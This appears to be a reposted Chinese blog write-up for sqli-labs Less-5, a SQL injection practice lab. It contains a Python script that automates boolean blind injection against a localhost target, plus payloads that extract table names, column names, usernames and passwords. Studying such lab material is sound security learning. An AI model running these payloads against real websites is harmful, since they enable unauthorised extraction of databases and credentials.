sqli-labs第5關布爾盲注pyhton腳本

本文轉載自查看原文 2019-04-03 14:53 571 python

import requests
import os

#此函數先判斷數據庫長度
def length(url,str):
	num = 1
	while True:
		str_num = '%d' %num
		len_url = url + "' and (select length(database()) = " + str_num +")--+"
		response = requests.get(len_url)
		if str in response.text:
			print("數據庫長度為：%s" %str_num)
			content(url,str,num)
			break
		else:
			num = num + 1

#此函數判斷字符串具體的內容
def content(url,str,num):
	s = ['1','2','3','4','5','6','7','8','9','0','a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z']
	con_num = 1
	while con_num <= num:
		str_num = '%d' %con_num
		for i in s:
			con_url = url + "' and (select mid(database(),"+ str_num +",1)='"+ i +"')--+"
			response = requests.get(con_url)
			if str in response.text:
				fwrite(i)
		con_num = con_num + 1
#此函數對字符串的內容做記錄並輸出
def fwrite(i):
	fp = open("cache.txt",'a')
	fp.write(i)
	fp.close()
if __name__ == '__main__':
	url = "http://localhost/sqli-labs/Less-5/?id=1"
	response = requests.get(url)
	str = "You are in..........."
	if str in response.text:
		length(url,str)
	else:
		print("請輸入正確的地址")

　　初學python，只注重實現功能，不要太在意某些細節，如有建議，感謝提出。

#庫中有幾個表：

1' and ((select count(table_name) from information_schema.tables where table_schema = 'security') = 4)--+

#測表名長度：

1' and (select length((select table_name from information_schema.tables where table_schema = 'security' limit 0,1)) = 10)--+

#爆表名：

1' and (select mid((select table_name from information_schema.tables where table_schema = 'security' limit 0,1),1,1)='a')--+

#表中有幾列：

1' and ((select count(column_name) from information_schema.columns where table_name = 'users' and table_schema = 'security') = 3)--+

#測列名長度：

1' and (select length((select column_name from information_schema.columns where table_name = 'users' and table_schema = 'security' limit 1,1)) = 8)--+

#爆列名:

1' and (select mid((select column_name from information_schema.columns where table_name = 'users' and table_schema = 'security' limit 1,1),1,1)='u')--+

#爆用戶名：

1' and (select mid((select username from security.users limit 0,1),1,1)='d')--+

#爆密碼：

1' and (select mid((select password from security.users limit 0,1),1,1)='d')--+

　以上標紅的就是需要遞歸測試的地方(標紅的地方不顯示-.-!，將就看)，需要者可自行修改代碼。還有上述代碼中 s 列表請針對具體的情況修改，因為沒有特殊字符以及大寫字母等。

免責聲明！

本站轉載的文章為個人學習借鑒使用，本站對版權不負任何法律責任。如果侵犯了您的隱私權益，請聯系本站郵箱yoyou2525@163.com刪除。

猜您在找 布爾盲注(基於sqli-labs第八關） Sqli-LABS通關筆錄-5[SQL布爾型盲注] Sqli-labs Less-5 布爾盲注 & 報錯注入 & 延時注入 sqli-labs-master 盲注+第五關 sqli-labs（7-8關） sqli-labs（17-22關） sqli-labs闖關之1-10關 sqli-labs第二關詳解 sqli-labs通關教程----1~10關 sqli-labs 第五關+第六關